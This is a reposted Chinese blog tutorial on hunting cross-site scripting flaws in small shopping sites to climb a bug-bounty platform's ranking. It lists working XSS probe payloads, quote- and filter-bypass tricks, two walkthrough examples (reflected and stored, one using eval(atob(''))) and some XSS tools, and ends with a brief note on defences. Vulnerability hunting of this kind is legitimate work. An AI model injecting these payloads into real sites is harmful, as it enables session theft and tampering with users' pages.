您好,登錄后才能下訂單哦!
這篇文章給大家介紹如何利用xss漏洞shua盒子rank的,內容非常詳細,感興趣的小伙伴們可以參考借鑒,希望對大家能有所幫助。
我們來挖小商城的xss,因為商城的xss輸入點多
01
第一步:
搜索框判斷:
onfocus=alert1 autofocus
那兩個是反引號,實測可用,在不使用 ‘ ” ( )的情況下,但是一般都要閉合value的 "
“ onfocus=alert('1') autofocus ”
"onclick="alert(1)
"><img src=x onerror=aLert(1)><!--
%22><img src=x onerror=aLert(1)><!--
(有趣的現(xiàn)象,url編碼能繞過簡單的反斜杠)
見招拆招了,一般都不會費盡心思過濾什么特殊的字符,都是直接函數(shù)過濾
真的過濾了,繼續(xù)看
1.輸入:
事件判斷一波,博主兩次遇到一個商城cms,漏了兩個事件onuoload(頁面關閉時觸發(fā)),onbblclick(雙擊時觸發(fā))
2.常用的判斷一波:
這都是常用的字符
3.特殊字符判斷一波
~!@#$%^&*()_+-={}|:"<>?[]\;',./
一般< > ' " 都過濾的了,有時也會漏下 ‘ ,作者也不是很清楚為什么
02
第二步
如果這簡單的搜索框都做的很好,那么自行考慮要不要繼續(xù)挖掘
作者遇到一個,注冊登陸后,它是一個選擇題,都過濾了的,但正確選項那個答案沒有過濾
一般就這兩個就夠了
第三步
說這么多,來兩個簡單的實戰(zhàn)吧(難的,自己也菜的摳腳)
第一個,反射:
http://www.xx.com
(就不打碼了,就一個簡單的反射xss)
輸入
">
<img src=x onerror=prompt(1)
>
輸入
第二個,存儲xss
作者找了另一個網站當例子
1.搜索框反射
輸入
">
<img src=x onerror=aLert(1)>
<!--
2.存在存儲xss
12">
</textarea>
<img src=x onerror=eval(atob(''))>
<!--
按著作者的方法,只要你有耐心和時間,rank真的問題不大,有圖有真相,
xss工具
1.github腳本
來自一位前輩的收集
簡單測試過,把其他的腳本payload轉移到了BruteXSS里,其他的作者用起來效果不是很好(可能沒有找到使用方法吧)
就是上文的 prompt (有點小瑕疵就是,誤報,誤報后就停止了,還在思考解決)
2.xsser,kali自帶的一款工具,由于作者沒有研究過,就不擴展討論了
xss防御
作者的淺薄見解
很粗暴的方法:輸入實體化,敏感詞過濾
作者見過一個cms的過濾是這樣的,on開頭過濾掉(現(xiàn)在想來應該沒有過濾完),script,src,img,iframe,ifame等敏感可引入詞過濾,再加上輸入實體化
關于如何利用xss漏洞shua盒子rank的就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。
免責聲明:本站發(fā)布的內容(圖片、視頻和文字)以原創(chuàng)、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。